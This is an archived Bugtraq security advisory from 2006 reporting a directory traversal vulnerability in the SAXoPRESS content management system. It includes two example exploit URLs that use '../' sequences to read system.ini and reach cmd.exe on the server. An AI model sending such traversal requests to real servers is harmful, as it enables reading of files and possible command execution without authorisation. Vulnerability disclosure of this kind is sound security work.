[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
SAXoPRESS - directory traversal
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: SAXoPRESS - directory traversal
- From: securiteam@xxxxxxxxxx
- Date: 11 Apr 2006 15:37:16 -0000
SAXoPRESS is a content management system, mainly used for news publishing.
A vulnerability exists in SAXoPRESS, which allows malicious users to read the
contents of files on the server, and possibly execute arbitrary commands.
Example exploit:
http://example.com/apps/pbcs.dll/misc?url=../../../../../../../../../../winnt/system.ini
http://example.com/apps/pbcs.dll/misc?url=../../../../../../../../../../winnt/system32/cmd.exe
Affected versions: unconfirmed